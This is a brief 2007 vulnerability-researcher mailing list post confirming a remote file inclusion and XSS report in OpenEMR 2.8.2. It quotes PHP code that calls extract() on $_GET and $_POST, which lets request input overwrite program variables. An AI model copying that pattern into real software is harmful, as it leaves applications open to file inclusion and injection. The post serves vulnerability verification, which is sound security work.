[VIM] VERIFY of RFI and XSS in OpenEMR 2.8.2 (was [still bogus] V [mike at carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion])

Steven M. Christey coley at linus.mitre.org
Wed Jan 31 15:03:39 EST 2007


On Wed, 31 Jan 2007, Heinbockel, Bill wrote:

> > if ($ps === false) {
> >     extract($_GET);
> >     extract($_POST);
> > }
>
> ** WHOOPS. The vendor did do the right thing, until those two little
> extract statements
> were slipped in for "normal operation".**

Great find, Bill.  Reminds me of why I love to hate PHP.

- Steve


More information about the VIM mailing list